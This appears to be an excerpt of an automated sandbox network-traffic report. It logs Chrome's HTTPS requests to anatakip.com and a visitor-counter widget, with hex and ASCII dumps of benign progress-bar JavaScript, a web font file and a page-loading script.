                    2024-05-26 22:57:35 UTC1369INData Raw: 63 6c 61 73 73 3d 22 73 70 69 6e 6e 65 72 22 20 72 6f 6c 65 3d 22 73 70 69 6e 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 69 6e 6e 65 72 2d 69 63 6f 6e 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 27 7d 3b 4e 50 72 6f 67 72 65 73 73 2e 63 6f 6e 66 69 67 75 72 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 70 74 69 6f 6e 73 29 7b 76 61 72 20 6b 65 79 2c 76 61 6c 75 65 3b 66 6f 72 28 6b 65 79 20 69 6e 20 6f 70 74 69 6f 6e 73 29 7b 76 61 6c 75 65 3d 6f 70 74 69 6f 6e 73 5b 6b 65 79 5d 3b 69 66 28 76 61 6c 75 65 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 6f 70 74 69 6f 6e 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6b 65 79 29 29 53 65 74 74 69 6e 67 73 5b 6b 65 79 5d 3d 76 61 6c 75 65 3b 7d 0a 72 65 74 75 72 6e 20 74 68 69 73 3b 7d 3b 4e 50 72 6f 67 72
                    Data Ascii: class="spinner" role="spinner"><div class="spinner-icon"></div></div>'};NProgress.configure=function(options){var key,value;for(key in options){value=options[key];if(value!==undefined&&options.hasOwnProperty(key))Settings[key]=value;}return this;};NProgr
                    2024-05-26 22:57:35 UTC1369INData Raw: 68 2e 72 61 6e 64 6f 6d 28 29 29 2e 73 65 74 28 31 29 3b 7d 3b 4e 50 72 6f 67 72 65 73 73 2e 69 6e 63 3d 66 75 6e 63 74 69 6f 6e 28 61 6d 6f 75 6e 74 29 7b 76 61 72 20 6e 3d 4e 50 72 6f 67 72 65 73 73 2e 73 74 61 74 75 73 3b 69 66 28 21 6e 29 7b 72 65 74 75 72 6e 20 4e 50 72 6f 67 72 65 73 73 2e 73 74 61 72 74 28 29 3b 7d 65 6c 73 65 7b 69 66 28 74 79 70 65 6f 66 20 61 6d 6f 75 6e 74 21 3d 3d 27 6e 75 6d 62 65 72 27 29 7b 61 6d 6f 75 6e 74 3d 28 31 2d 6e 29 2a 63 6c 61 6d 70 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 6e 2c 30 2e 31 2c 30 2e 39 35 29 3b 7d 0a 6e 3d 63 6c 61 6d 70 28 6e 2b 61 6d 6f 75 6e 74 2c 30 2c 30 2e 39 39 34 29 3b 72 65 74 75 72 6e 20 4e 50 72 6f 67 72 65 73 73 2e 73 65 74 28 6e 29 3b 7d 7d 3b 4e 50 72 6f 67 72 65 73 73 2e 74 72 69
                    Data Ascii: h.random()).set(1);};NProgress.inc=function(amount){var n=NProgress.status;if(!n){return NProgress.start();}else{if(typeof amount!=='number'){amount=(1-n)*clamp(Math.random()*n,0.1,0.95);}n=clamp(n+amount,0,0.994);return NProgress.set(n);}};NProgress.tri
                    2024-05-26 22:57:35 UTC1369INData Raw: 43 68 69 6c 64 28 70 72 6f 67 72 65 73 73 29 3b 72 65 74 75 72 6e 20 70 72 6f 67 72 65 73 73 3b 7d 3b 4e 50 72 6f 67 72 65 73 73 2e 72 65 6d 6f 76 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 6d 6f 76 65 43 6c 61 73 73 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 27 6e 70 72 6f 67 72 65 73 73 2d 62 75 73 79 27 29 3b 72 65 6d 6f 76 65 43 6c 61 73 73 28 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 53 65 74 74 69 6e 67 73 2e 70 61 72 65 6e 74 29 2c 27 6e 70 72 6f 67 72 65 73 73 2d 63 75 73 74 6f 6d 2d 70 61 72 65 6e 74 27 29 3b 76 61 72 20 70 72 6f 67 72 65 73 73 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6e 70 72 6f 67 72 65 73 73 27 29 3b 70 72 6f 67 72 65 73 73 26
                    Data Ascii: Child(progress);return progress;};NProgress.remove=function(){removeClass(document.documentElement,'nprogress-busy');removeClass(document.querySelector(Settings.parent),'nprogress-custom-parent');var progress=document.getElementById('nprogress');progress&
                    2024-05-26 22:57:35 UTC1369INData Raw: 3d 3d 31 29 6e 65 78 74 28 29 3b 7d 3b 7d 29 28 29 3b 76 61 72 20 63 73 73 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 73 73 50 72 65 66 69 78 65 73 3d 5b 27 57 65 62 6b 69 74 27 2c 27 4f 27 2c 27 4d 6f 7a 27 2c 27 6d 73 27 5d 2c 63 73 73 50 72 6f 70 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 61 6d 65 6c 43 61 73 65 28 73 74 72 69 6e 67 29 7b 72 65 74 75 72 6e 20 73 74 72 69 6e 67 2e 72 65 70 6c 61 63 65 28 2f 5e 2d 6d 73 2d 2f 2c 27 6d 73 2d 27 29 2e 72 65 70 6c 61 63 65 28 2f 2d 28 5b 5c 64 61 2d 7a 5d 29 2f 67 69 2c 66 75 6e 63 74 69 6f 6e 28 6d 61 74 63 68 2c 6c 65 74 74 65 72 29 7b 72 65 74 75 72 6e 20 6c 65 74 74 65 72 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3b 7d 29 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 67 65 74 56 65 6e 64 6f 72 50 72
                    Data Ascii: ==1)next();};})();var css=(function(){var cssPrefixes=['Webkit','O','Moz','ms'],cssProps={};function camelCase(string){return string.replace(/^-ms-/,'ms-').replace(/-([\da-z])/gi,function(match,letter){return letter.toUpperCase();});}function getVendorPr
                    2024-05-26 22:57:35 UTC319INData Raw: 74 75 72 6e 3b 6e 65 77 4c 69 73 74 3d 6f 6c 64 4c 69 73 74 2e 72 65 70 6c 61 63 65 28 27 20 27 2b 6e 61 6d 65 2b 27 20 27 2c 27 20 27 29 3b 65 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 3d 6e 65 77 4c 69 73 74 2e 73 75 62 73 74 72 69 6e 67 28 31 2c 6e 65 77 4c 69 73 74 2e 6c 65 6e 67 74 68 2d 31 29 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 63 6c 61 73 73 4c 69 73 74 28 65 6c 65 6d 65 6e 74 29 7b 72 65 74 75 72 6e 28 27 20 27 2b 28 65 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 7c 7c 27 27 29 2b 27 20 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 73 2b 2f 67 69 2c 27 20 27 29 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 28 65 6c 65 6d 65 6e 74 29 7b 65 6c 65 6d 65 6e 74 26 26 65 6c 65 6d 65 6e 74 2e 70 61 72 65 6e 74 4e 6f 64 65
                    Data Ascii: turn;newList=oldList.replace(' '+name+' ',' ');element.className=newList.substring(1,newList.length-1);}function classList(element){return(' '+(element.className||'')+' ').replace(/\s+/gi,' ');}function removeElement(element){element&&element.parentNode


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.549736104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:34 UTC589OUTGET /widget/instamark.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:35 UTC373INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:57:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/14/1431.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15d7178428c35-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:35 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.549737104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:35 UTC688OUTGET /assets/fonts/fontawesome-webfont.woff2?v=4.6.3 HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    Origin: https://anatakip.com
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: */*
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: font
                    Referer: https://anatakip.com/assets/style/font-awesome.min.css
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
                    2024-05-26 22:57:35 UTC744INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:35 GMT
                    Content-Type: font/woff2
                    Content-Length: 71896
                    Connection: close
                    cache-control: public, max-age=604800
                    expires: Fri, 31 May 2024 01:51:11 GMT
                    last-modified: Tue, 30 Apr 2024 19:23:27 GMT
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: HIT
                    Age: 248784
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RHrSss%2BJmo%2FCTxoOrW1uk0%2FSitKFb5J39Va9OdWva9eP2kCRbA%2FbzJAtIBSJgBeEwwpvEF4GADsV2LdBpORnLAbf9PM8hriqJRCuHxGDpC3%2FcoEVCTeJ%2B40NeeUq7n8%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d7308e91921-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:35 UTC625INData Raw: 77 4f 46 32 00 01 00 00 00 01 18 d8 00 0e 00 00 00 02 54 c8 00 01 18 79 00 04 01 89 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 20 06 60 00 86 02 11 08 0a 88 bb 50 86 e9 4b 01 36 02 24 03 95 00 0b 95 18 00 04 20 05 86 7c 07 b2 4c 3f 77 65 62 66 06 5b 38 e0 91 00 d6 6d 3b af 74 05 e9 cd fa d3 d5 e7 e8 00 63 36 c2 d6 9b 15 96 f0 3e bc 53 ad 38 ae 7b 1c 80 19 5d 3f fb ff ff ff 3f 3d 69 8c a1 25 81 e6 00 50 d5 da ae da ad fb ff cf 66 38 35 4a 88 30 aa b9 75 04 0f b2 98 66 b1 b0 c9 65 42 af 5c d8 eb a6 02 45 b9 6c fb fd e8 fd 81 41 77 98 d6 36 84 11 1c 66 b3 11 46 c0 8e a0 30 6c 9b 0d c3 b6 4d 81 60 3b 69 96 4f df 9e 55 13 cb d4 b1 e6 6b d9 b6 22 3d e8 cb b2 0b eb c3 ba 8a 96 f2 90 c1 2f 36 0f e1 2f 65 58 0d 71 a4 d5 76 66
                    Data Ascii: wOF2Ty?FFTM `PK6$ |L?webf[8m;tc6>S8{]??=i%Pf85J0ufeB\ElAw6fF0lM`;iOUk"=/6/eXqvf
                    2024-05-26 22:57:35 UTC1369INData Raw: f9 d7 75 af 53 aa 8a cf 99 21 e1 4a 04 59 35 9a 7b 6b fa a5 6a b5 a9 4a b2 9d cc 12 f3 69 a0 c1 f0 c9 21 7f 84 74 eb 22 bd bd a9 76 d9 10 fa 43 94 0c 30 1b 96 e1 70 9a 97 61 73 96 9c 67 0a 33 b3 7f be ff a9 7e 33 2f 8b 33 bb 3c 73 af c0 b1 0b 02 4b b2 9d b4 75 08 8b 74 af 6e 12 97 1c 17 1e e5 e5 74 53 b0 7c 7f a4 5d 96 7e 81 0c 49 2a 20 db 01 03 49 b2 03 0e a0 e3 01 37 79 b0 e1 45 4c 40 f0 96 42 15 25 13 92 fd df 54 54 54 f5 7a 75 5c 99 dd df 18 eb 65 62 a4 62 4d 0b 2e 2d 66 f4 3f d9 fb f8 00 20 08 4f 73 24 2f 2e 59 a3 1d a0 b9 75 0b a2 37 18 03 46 8d 51 35 d8 46 0d d8 ad 8a 15 db e8 8d dc 88 1c d1 1b 25 a5 b4 0a a2 02 a2 a2 62 60 a3 18 d8 6f d5 ab ff 06 da 6f d4 fb ad 8f 63 1c 80 0e 74 03 dd 40 37 d0 2a 1b 7b 48 4b a9 c2 c5 50 14 81 39 16 be 28 d5 2a 5b
                    Data Ascii: uS!JY5{kjJi!t"vC0pasg3~3/3<sKutntS|]~I* I7yEL@B%TTTzu\ebbM.-f? Os$/.Yu7FQ5F%b`ooct@7*{HKP9(*[
                    2024-05-26 22:57:35 UTC1369INData Raw: af c8 91 71 f3 0c 4a 6e d5 21 64 bb f0 4c 11 01 5d 6e 15 24 32 9a 38 a4 28 d1 3f 81 e5 a5 a4 3a 79 64 29 a1 92 62 8a f0 ca e8 08 93 cd 4a 06 82 9c 5b 4a d3 1a 45 bf 90 36 8c 90 89 6b 08 3f cd 90 cc b9 27 96 db ff 90 22 c3 17 38 b8 e2 fd 19 f0 f0 48 f0 8b 22 13 37 6c 92 7c 4f 1b 73 13 08 84 50 34 88 4a 84 96 4f ee 06 c2 dc 93 66 12 9a b0 9c 41 f8 26 29 8f 80 64 4a 60 09 5d 6e ba 15 97 68 08 69 5b b3 13 a2 ea 06 96 fb 0f 81 a9 53 ab 28 fa 14 b1 10 5b f1 4f 7e 18 de 1b f6 1c e6 1b 2c 36 66 3d 32 d8 71 b3 18 f9 00 35 8e e5 56 e3 1f 4d 4f c2 d1 ae ad ce 9c 48 73 c5 dc f9 03 11 3e 5a 76 60 ec 66 bb 89 37 8b 7d 33 bd 66 6d c8 58 bf 26 f1 63 0b 0d 71 c7 bf ed fc fb c0 82 32 de 71 60 7e b9 eb ee 1e e9 bf f9 e6 06 78 8e 23 6b 40 97 89 30 58 3a af f9 24 31 fb f3 0b
                    Data Ascii: qJn!dL]n$28(?:yd)bJ[JE6k?'"8H"7l|OsP4JOfA&)dJ`]nhi[S([O~,6f=2q5VMOHs>Zv`f7}3fmX&cq2q`~x#k@0X:$1
                    2024-05-26 22:57:35 UTC1369INData Raw: 7d fc b3 23 52 a4 b6 a4 a9 3a b3 17 c6 9b 4b 43 64 4c 58 35 60 48 f9 e1 57 36 d8 b5 ad 35 df 57 c2 04 2b 97 04 df 95 22 65 a4 d7 94 12 4b 34 9b b5 61 4d a9 4e 49 68 20 76 bb 4e 29 8c c3 05 03 4e 89 1a e7 10 73 5b d7 2a f3 65 e0 51 bf da d4 8e 0b 46 7c c9 ae a9 9b e6 b9 97 ed a5 29 dd 73 08 af 3d e1 6e df cd a1 46 a4 61 5e 25 1d de 92 cf de c2 f1 62 93 52 52 e7 0a 2e 0a 91 75 6b fc 87 41 64 e7 b4 f5 34 68 d4 b2 e9 cd c0 d8 ad 23 3d 9a 6b c1 39 34 f8 7a a8 81 4b e9 f4 fd 10 b3 93 b8 f2 f8 b4 b9 d1 b2 a9 08 9a 0a 9f 3d 20 2a bd fb 60 f8 a4 78 83 3b 5d e1 70 ac a5 54 2c 8f 2e fa 97 c2 1e 97 11 6e 4f 71 15 77 4c 34 b0 60 93 e1 38 44 10 2d 79 d1 dc b0 b5 f1 47 ec e9 27 9a 2c 31 2f 26 0f ab fe b5 8e 1e 5b 2a c4 51 f9 6d 50 91 8e 4b a1 95 2f 02 ba e4 74 e9 d2 c4
                    Data Ascii: }#R:KCdLX5`HW65W+"eK4aMNIh vN)Ns[*eQF|)s=nFa^%bRR.ukAd4h#=k94zK= *`x;]pT,.nOqwL4`8D-yG',1/&[*QmPK/t
                    2024-05-26 22:57:35 UTC1369INData Raw: e6 e4 9d 4b 0b 68 b1 f3 f5 15 c4 cd a9 5c ed e4 5a 3e 85 ab 3b dd 54 c7 65 46 d6 e5 66 c8 7f 93 d5 57 29 13 37 e8 86 c2 97 09 57 0a 49 e8 c7 28 07 88 db 32 ce 78 b2 3c 95 20 ce ca 7c 2a cf d1 48 02 e1 d6 8e f4 16 c5 a5 b8 01 fe cb 2b c2 f3 ab a1 c2 79 4e b5 41 0d e3 ba bc f8 f8 7a ce ee fd 36 f5 69 44 46 f8 04 df 30 45 ab dc 39 01 24 c1 b3 20 fc db 7a af 05 e7 0b 89 44 dd 0f 84 30 ae e1 d9 15 a4 74 e1 3c d0 a7 00 cb f5 8e 63 e8 c7 41 49 0f ac 82 7f 5a 0c 99 51 87 cb 28 63 00 c7 97 30 cf 05 9f 97 69 2e 6f 81 f4 62 2e 9b 78 66 28 df 27 14 82 8f 76 b0 89 45 dd 85 d8 8e ca 55 4b 84 90 bb a1 1f ec 3d a0 2f 4e f2 40 51 8c a1 b6 99 b3 c3 af fe 92 6f 5e b9 68 ca f1 12 1b ea 6a 2b c6 9f a8 b0 fa 42 7f ff 61 22 fe c8 08 ea b8 f3 d5 55 fd 0d 2a 10 8a 83 1e 73 4c e5
                    Data Ascii: Kh\Z>;TeFfW)7WI(2x< |*H+yNAz6iDF0E9$ zD0t<cAIZQ(c0i.ob.xf('vEUK=/N@Qo^hj+Ba"U*sL
                    2024-05-26 22:57:35 UTC1369INData Raw: 02 6d 2b b8 78 e1 b3 54 3a c4 db 02 f7 6a 52 34 42 85 6b 88 7f ab c9 8f d6 1e ac b6 ac 91 77 8f 1c 72 35 b1 d8 ae 84 7e 26 08 e7 f5 34 e1 4c d9 cb be 02 20 a4 9d c3 10 ae 73 47 d3 ca fb 9b 8c dd c2 1b 13 0f 2c 23 37 96 47 e2 6e 13 3e b2 bf 4f 19 11 e3 c2 f0 f7 f5 cb af 69 a5 84 44 e2 b1 9d 60 32 1e 4e 7e c9 5f 21 a2 b3 12 39 ef 4f 52 fd 3f 6a c5 e2 7f 2e 8b e9 d0 1a bd f2 5f 4b fc 30 c6 81 42 6e f4 e0 ab 27 57 8f 4b c4 db 6c a2 a8 f9 59 a0 ae 0c e3 cb e8 95 74 0d a8 ff 74 b1 72 d3 a5 69 4a f7 ba 8c a5 27 6e 7b 6b af 30 11 23 67 4e 93 52 09 2c 81 3b b5 7e 6b ac ff c4 d1 97 bd ba b5 71 b9 6a 8e ab d5 d7 76 38 6d 3e 5e ab ae 6a 06 76 16 1d 40 84 3a 94 54 02 16 c9 ff 11 1f 28 08 6d ca 48 99 e2 fb 44 3a e5 b6 a1 07 b1 b6 3c 28 d5 a2 db 3c b7 0f 67 91 25 80 93
                    Data Ascii: m+xT:jR4Bkwr5~&4L sG,#7Gn>OiD`2N~_!9OR?j._K0Bn'WKlYttriJ'n{k0#gNR,;~kqjv8m>^jv@:T(mHD:<(<g%
                    2024-05-26 22:57:35 UTC1369INData Raw: 0c 99 af 47 31 db a5 52 b1 14 9d e0 ca 65 99 9c be 15 e1 e2 a3 9f 19 97 12 6a b9 6d 05 13 df 3a 73 14 c2 d0 07 ea a8 dd 68 55 2f f2 d3 59 74 38 05 5c d7 d3 d1 76 8b 0d 53 09 9c 4e c7 72 58 cb 76 ae a6 3e 18 ad 5e 80 32 99 45 4d 43 c1 59 5b 27 b8 d8 f8 0d df b6 b1 9b c2 a4 0e 3a a0 3a 85 89 fd 5f 63 e5 7c 59 9d 84 f9 78 5e 51 05 1a 4c 27 00 a2 71 ed 3a 46 ba ac 98 5e 5a 95 e3 88 af ac 32 64 20 05 2a 4e 78 09 d1 1e 30 f9 6e b9 6e c1 cc 34 23 18 05 b5 a3 e9 18 4d 43 d7 41 5d 44 bb d0 86 0c b6 31 bf 2b c0 90 71 5e d7 16 95 ce 1d 2d ad 7c 8f 99 e8 06 8a 50 1b 25 5d 06 e5 bd 04 b9 c7 2a e5 ba 4d be 75 5b bd bd 92 16 35 d6 fc 11 15 64 ec a2 29 15 7c ce f7 e6 60 d7 05 ad 32 16 16 6b 5b 57 cb 1f c9 45 63 31 da 57 5d c8 7a f5 c4 15 80 8a 47 1b 6f bc e8 52 cb 24 6f
                    Data Ascii: G1Rejm:shU/Yt8\vSNrXv>^2EMCY['::_c|Yx^QL'q:F^Z2d *Nx0nn4#MCA]D1+q^-|P%]*Mu[5d)|`2k[WEc1W]zGoR$o
                    2024-05-26 22:57:35 UTC1369INData Raw: 42 40 2d f5 89 d0 18 cd 74 32 4d 75 33 50 28 73 37 b0 41 90 7e 2c c2 3c fb 8a af 1a bc 93 ed 6f 02 3d 46 70 ca 00 70 19 93 2a 17 a3 48 d7 ff 1f 4c c3 36 03 29 0c 03 1d 6d 9f c4 e6 b9 a2 44 34 08 b8 23 10 b3 0f 30 a4 80 42 4d c5 6e fb a1 20 ba d3 65 d2 7f 42 48 c7 af 61 e0 bd de 21 d8 83 3d 0b bd 4b 1f 32 25 06 62 db 83 5c ad 3b 29 ca 88 8e aa e6 18 20 e4 6c 93 d0 d9 e6 94 d4 36 33 c6 b5 cf 5c 39 2f 18 71 4e 6e 71 6b 25 f0 89 27 28 85 c7 0d 58 b4 ca c9 7a c9 5c 16 42 11 6e bd c0 b9 a4 fa 40 db cd 97 ee ae 20 f4 a6 8b 58 3f 81 a6 db 32 80 1e eb 82 55 10 8e a2 23 46 f4 da 61 9b a5 8f 67 71 86 d4 69 5c 31 ab 21 46 aa 4a 23 54 2a b4 20 ce 66 2f a1 9a d2 d3 16 82 a7 6b 37 bb 7e 8d ab 23 87 35 e9 e4 52 2c 72 02 b7 20 45 ff d8 78 ca d6 4f d0 1a 4f 2a 27 b9 8b 91
                    Data Ascii: B@-t2Mu3P(s7A~,<o=Fpp*HL6)mD4#0BMn eBHa!=K2%b\;) l63\9/qNnqk%'(Xz\Bn@ X?2U#Fagqi\1!FJ#T* f/k7~#5R,r ExOO*'
                    2024-05-26 22:57:35 UTC1369INData Raw: eb e1 0f 2a 0e 7b f2 5b 3f 1a b4 39 7b 0c 71 64 5e a7 c3 70 d9 5e 9f 6d 9a 96 60 9b 18 dc 60 76 13 ed 6b 52 e8 8b d0 eb b3 3c 6c 71 ba ba dc b6 af 54 71 c0 ce 84 65 cc 08 55 9f 2e 63 a0 1d 31 bc 27 2b ef 8f cd d9 36 c7 ee 34 f0 8e e4 49 37 24 90 f0 f0 7e 4e 45 e5 f6 6c 93 a2 21 1e 10 f7 3a 05 e2 39 29 69 e2 20 33 a8 f7 e0 ba e5 7b b7 00 bb e6 4f cf c3 1d 0d 56 eb b8 37 9c 26 0f 64 23 a9 8d 46 06 97 6a ca 25 9b 1c 10 9d 92 18 d0 31 69 be 7e 4a 0d de 30 b8 96 4b a1 eb 7e ba 77 47 fe b5 7c bd ec ef 12 ff a6 6b f9 cc 6b 78 a8 ae de a0 99 cd 06 df 43 c9 d6 10 b4 f5 4d 95 71 27 39 e5 23 15 a5 1d 35 a2 ca 87 10 9b 0a 87 2d 82 d0 66 b9 1b 1a 09 58 80 e7 30 e3 a5 30 46 69 b0 8e 1d 0c f7 6e 25 38 a6 38 24 2b 43 21 e2 c2 b3 b8 f2 31 43 d3 80 5d e4 75 46 d1 38 e9 63
                    Data Ascii: *{[?9{qd^p^m``vkR<lqTqeU.c1'+64I7$~NEl!:9)i 3{OV7&d#Fj%1i~J0K~wG|kkxCMq'9#5-fX00Fin%88$+C!1C]uF8c
                    2024-05-26 22:57:35 UTC1369INData Raw: 6a 58 de e8 ef 26 60 b2 8c f9 13 53 b1 f7 c3 2b d3 e2 be 2e cb 46 2b f4 63 61 78 19 a8 85 86 99 e0 4a 9e f0 1a 90 54 0f 43 16 88 4f 01 f9 ab 0e b4 5f db 3f e2 0f ec 1a cd 05 66 4d a5 2e dc e0 45 7f e0 b8 68 f4 8b c6 03 c1 1f 30 d1 8f a7 3b 9b f2 79 c9 c4 a9 3e 08 01 96 bb e1 59 d3 67 c9 f5 15 1a 2e 87 59 8c 01 8d 4f c5 d6 49 69 8a 5e d1 c0 25 c8 cd 47 4e d8 79 45 9a 3c 30 9d b7 0a 96 a0 cb a8 82 a1 61 4a f3 a5 3e e0 e6 46 3b 4c 08 0f 69 ea 7b cc 1e 4b 4d 42 2d 93 ab f1 d3 ea 9e 4c 57 c9 dc 11 30 97 79 a7 91 2f 2b a3 c4 aa d6 f6 3c e7 12 94 2c 7d 38 95 56 b0 23 1e f1 cd ff 5b b7 b1 c1 70 59 ad 2e 92 ea f2 7a 76 45 e0 85 52 b8 e6 4b 7b 5e f6 70 a0 24 ac c4 d1 20 fe 82 c2 5b 76 f6 f2 c9 77 b2 9a 1d 1b e6 77 6f 4e 96 9c cc 81 43 ce f9 e4 99 63 b1 60 d4 89 c7
                    Data Ascii: jX&`S+.F+caxJTCO_?fM.Eh0;y>Yg.YOIi^%GNyE<0aJ>F;Li{KMB-LW0y/+<,}8V#[pY.zvERK{^p$ [vwwoNCc`


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.549738104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:35 UTC612OUTGET /assets/core/core.js?v=3.1.10 HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: */*
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: script
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
                    2024-05-26 22:57:35 UTC834INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:35 GMT
                    Content-Type: application/javascript
                    Content-Length: 11083
                    Connection: close
                    Cf-Bgj: minify
                    Cf-Polished: origSize=15679
                    cache-control: public, max-age=604800
                    expires: Thu, 30 May 2024 09:03:20 GMT
                    last-modified: Tue, 30 Apr 2024 19:23:27 GMT
                    vary: Accept-Encoding,Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: HIT
                    Age: 309255
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y1wcIZICPtwok4hX2RD3imAL6I5b1BKX7ecILsfrqFHAoGAmtW48InmG00ZfT2JURKuSNAJsWpMZpByl6zuZcwXD4dknTlQsR6i%2FVgLiiCgU%2BZkMLI00DsEi%2BEXdxrI%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d733c57423f-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:35 UTC535INData Raw: 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 4d 6f 72 65 28 6d 61 78 49 44 29 7b 24 28 27 23 62 74 6e 4c 6f 61 64 4d 6f 72 65 27 29 2e 72 65 6d 6f 76 65 28 29 3b 24 28 27 23 65 6e 74 72 79 2d 6c 69 73 74 2d 72 6f 77 27 29 2e 66 69 72 73 74 28 29 2e 61 70 70 65 6e 64 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 6d 70 4c 6f 61 64 69 6e 67 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 73 70 69 6e 6e 65 72 20 66 61 2d 73 70 69 6e 20 66 61 2d 32 78 22 3e 3c 2f 69 3e 20 59 c3 bc 6b 6c c3 bc 79 6f 72 2e 2e 3c 2f 64 69 76 3e 27 29 3b 24 2e 61 6a 61 78 28 7b 75 72 6c 3a 27 3f 66 6f 72 6d 54 79 70 65 3d 6d 6f 72 65 27 2c 74 79 70 65 3a 27 50 4f 53 54 27 2c 64 61 74 61 3a 27 6d 61 78 69 64 3d 27 2b 6d 61 78 49 44 7d 29 2e 64 6f 6e 65 28 66 75 6e 63 74 69 6f 6e
                    Data Ascii: function loadMore(maxID){$('#btnLoadMore').remove();$('#entry-list-row').first().append('<div class="tempLoading"><i class="fa fa-spinner fa-spin fa-2x"></i> Yklyor..</div>');$.ajax({url:'?formType=more',type:'POST',data:'maxid='+maxID}).done(function
